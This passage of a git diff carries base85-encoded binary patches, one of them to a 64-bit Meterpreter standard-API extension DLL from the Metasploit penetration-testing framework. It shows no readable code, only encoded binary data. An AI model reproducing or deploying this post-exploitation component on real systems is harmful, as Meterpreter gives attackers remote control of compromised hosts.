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

diff --git a/data/meterpreter/ext_server_stdapi.x64.dll b/data/meterpreter/ext_server_stdapi.x64.dll
index 56eedf98f07fc6f4c03708a3e495adb62513e2c0..8c539121e9ce58b93d3600db00a1d094d68e5c94 100755
GIT binary patch
delta 95785
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%0A&xsQ{0
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
